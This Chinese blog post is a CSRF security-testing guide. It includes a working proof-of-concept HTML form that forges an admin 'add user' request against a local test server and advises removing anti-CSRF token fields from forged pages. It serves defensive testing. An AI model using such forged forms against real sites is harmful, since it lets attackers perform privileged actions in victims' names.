【安全】【测试思路】CSRF攻击-测试思路总结

最新推荐文章于 2024-08-15 10:53:11 发布
最新推荐文章于 2024-08-15 10:53:11 发布
阅读量676 收藏 1
点赞数
分类专栏: 安全测试 文章标签: 安全 软件测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fantasy_Boyce/article/details/105103635
版权

CSRF介绍

CSRF(Cross Site Request Foregy),中文名称之为跨站请求伪造。其攻击的原理是:攻击者利用实际用户的Cookies信息,以用户的身份,通过第三方网站,向被攻击网站发送非法请求(这一系列操作均由受害者在不知情的情况下完成的),从而绕过特定的权限进行操作数据、恶意攻击。
受害对象包含实际用户和被攻击网站。

CSRF攻击流程

攻击流程

测试思路

  1. 使用正常用户登录被测系统,获取涉及个人信息修改、敏感数据操作的请求,记录请求URL和参数;
  2. 编写HTML页面,或通过Burpsuite工具,生成相应的页面(需要注意页面内容,部分请求体中也存在防CSRF攻击的字段,如:tokenanti-CSRF等,需要甄别去除)。
  3. 使用1步骤中的浏览器,打开HTML页面,点击发送请求按钮。

案例

CSRF攻击新增用户

  1. 测试背景
    新增用户功能,属于管理员权限范畴,普通用户无此权限。此次,通过伪造一个新增用户的html页面,模拟管理员被诱导访问第三方网站,点击按钮,触发新增用户请求。
  2. 测试流程
    a. 获取新增用户的请求url和参数;

新增用户请求url
新增用户请求参数

b. 编写HTML页面,url和参数填入其中;(该系统的数据库字段有点小bug,别介意(~ ̄▽ ̄)~)

<html>
<title>CSRF Inject Page</title>
<div align="center">
	<form action="http://127.0.0.1:8080/gz/AdminServlet?method=addm&id=" method="POST">
		<input type="hidden" name="username" value="user8888" />
		<input type="hidden" name="password" value="123456" />
		<input type="hidden" name="tel" value="生产部" />
		<input type="hidden" name="realname" value="csrf用户" />
        <input type="hidden" name="sex" value="男" />
        <input type="hidden" name="age" value="总经理" />
      	<input type="hidden" name="address" value="13112345996" />

		<input type="submit" value="Click me!">
	</form>
</div>
</html>

c. 使用管理员登录系统,再新开标签页,打开HTML页面,点击按钮发起请求。
预期结果:状态码返回401鉴权失败,并给出错误提示。
实际结果:状态码返回200,提示操作成功。
csrf攻击请求
d. 去原系统界面任意操作,查看会话情况。
预期结果:会话失效,重定向至登录界面,本次token及sessionID被销毁(若有)。
实际结果:会话仍有效,未退出至登录页面。
界面会话情况

e. 去数据库查看用户是否添加成功(因后台数据处理问题导致乱码,不在此测试范围内)。
预期结果:数据库用户表未被新增数据,且未影响服务器、数据库等其他系统网元的正常运行。
实际结果:数据库用户表新增一条数据。
数据库用户表被插入一条数据
综上结果,该项目的新增用户功能没有做anti-CSRF,攻击成功。

次次次不吃饼干_
关注
专栏目录
CSRF思路分享.docx
04-14
因此,为了防止CSRF攻击,我们需要在网站上实施相应的安全措施,如验证用户身份,限制用户权限,使用验证码等。同时,我们也需要提高用户的安全意识,教育用户不要轻易点击未知链接,避免泄露个人隐私信息。
CSRF环境搭建及攻击测试
weixin_50341025的博客
04-15 641
一、环境搭建 1.pikachu-scrf实验模块 2.kali-apache搭建 apt-get update apt-get install apache2 service apache2 start 开启服务 php -version 应该打印出版本结果 cd /var/www/html 进入web根目录 将测试页面放入目录 3.测试网络是否可以打开 本机:http://192.168.75.1/pp/ Kali: http://192.168.75.128/csrgtest.php 二、
详解入门安全测试最难懂的概念 —— CSRF
liwenxiang629的博客
12-19 733
对于刚刚入门安全的同学来说,csrf是最难理解的概念之一,本文会用最简单的方式对csrf进行讲解,包括csrf的定义,csrf典型的攻击流程以及如何对其进行防范,希望本文能够帮到大家!
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
ewii12567的博客
08-15 954
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
CSRF攻击分析】
qq_55213436的博客
06-09 2460
目录一、什么是CSRF漏洞二、CSRF漏洞的原理和利用过程 三、CSRF漏洞的检测方法四、攻击利用姿势五、防护手段 CSRF即跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,可以这样来理解: 你登录某个网站,攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 一个经典的cs
渗透测试基础知识普及之CSRF
Zhongdongding的博客
04-21 705
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者通过伪造用户的请求,来执行一些非法操作,例如修改账户信息、发表评论、转账等。在进行安全渗透测试时,测试人员需要对应用程序进行CSRF测试,以发现和修复潜在的漏洞。测试人员可以使用Burp Suite等工具,来修改请求头中的CSRF Token,以绕过防御机制。同时,也需要定期进行安全渗透测试,以发现和修复潜在的漏洞。总之,进行CSRF测试需要测试人员具备一定的技能和经验,以发现和修复潜在的漏洞。
安全测试CSRF漏洞
myh919的博客
05-06 499
综上所述,要防御CSRF攻击,需要综合考虑服务端和客户端两方面的防御策略,其中服务端的防御效果较好。常见的防御策略包括验证HTTP Referer字段、使用Token并进行验证、在HTTP头中自定义属性并验证以及客户端防御。
[Web安全-CSRF漏洞]
m0_60571990的博客
02-24 374
[Web安全-CSRF漏洞]
API安全测试思路与基于Swagger的API自动化安全测试实践.pdf
08-07
总结来说,传统的REST API安全测试主要依赖手工测试,其过程繁琐且效率低下。而基于Swagger的自动化安全测试实践,不仅能够提高测试的效率和覆盖率,还能够帮助开发团队在软件开发生命周期的早期发现潜在的安全漏洞...
网络安全渗透思路(带视频讲解)
03-20
"网络安全渗透思路(带视频讲解)"这个资源提供了一个深入学习网络安全和渗透测试的平台。视频可能涵盖以下几个核心知识点: 1. **渗透测试基础**:介绍渗透测试的基本概念,包括测试的目标、过程和道德规范。它...
B/S测试通用case
01-20
- **安全测试**:测试SQL注入、XSS攻击CSRF漏洞等,确保系统安全。 除了以上模块,还应关注以下方面: - **兼容性测试**:检查系统在不同浏览器、操作系统、设备上的表现,确保兼容性良好。 - **异常处理测试*...
打造CTF+“肾”透测试攻城狮兴奋混合剂.pdf
08-08
信息安全领域的实践工作中,团队在进行Web漏洞、内网渗透测试时,会遇到各种技术难点和知识盲区,其中可能包括视频教程中的知识难以应用到实战中、大佬分享的技术思路难以理解、CTF竞赛中学习的知识难以在实际渗透...
软件安全测试-Web安全测试详解-CSRF攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-11 1087
CSRF(Cross-Site Request Forgery),跟XSS漏洞攻击一样,存在巨大的危害性。 你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
CSRF漏洞
MingShenfree的博客
10-28 715
CSRF漏洞原理 CSRF漏洞产生的原因是网站对用户的身份没有进行严格的认证,导致用户的身份令牌被盗用,从而造成用户信息泄露或用户信息被修改等 简单来说就是你家门上的电子密码被别人知道了,别人就可以进你家乱搞喽。可长点心吧孩子们。 用户身份认证 cookie: Cookie是一个非常具体的东西,是浏览器里面能永久存储的一种数据,cookie由服务器生成,发送给浏览器,浏览器把cookie以key-value的形...
CSRF漏洞:攻击原理、检测方法和防范措施
MachinegunJoe777的博客
09-20 126
CSRF漏洞是一种常见的网络安全威胁,但通过采取适当的防范措施,开发人员可以有效地保护他们的应用程序免受这种攻击的影响。渗透测试CSRF漏洞是一种重要的安全实践,帮助发现并解决潜在的风险。通过理解CSRF攻击的原理和防范措施,您可以更好地保护您的应用程序和用户的安全
CSRF漏洞原理攻击与防御(非常细)
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-15 1515
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
7.CSRF(跨站请求伪造)
qq_45926195的博客
10-31 148
7.1什么是csrf CSRF是Web应用程序的一种常见漏洞,其攻击特性是危害性大但非常隐蔽,尤其是在大量Web 2.0技术的应用背景下,攻击者完全可以在用户毫无察觉的情况下发起CSRF攻击 7.2csrf原理 Cross-site request forgery 简称为“CSRF”,在CSRF攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了 程序员开发的时候,未对相关页面进行token和REFERER判断,造成攻击者..
理解CSRF漏洞:原理、危害与防范
"文档分享了关于CSRF(跨站请求伪造)漏洞...总结,防止CSRF攻击的关键在于对敏感操作进行额外的验证,例如使用Token或者检查Referer头,确保请求来源于预期的页面。同时,及时修补XSS漏洞也是防止CSRF利用的重要措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值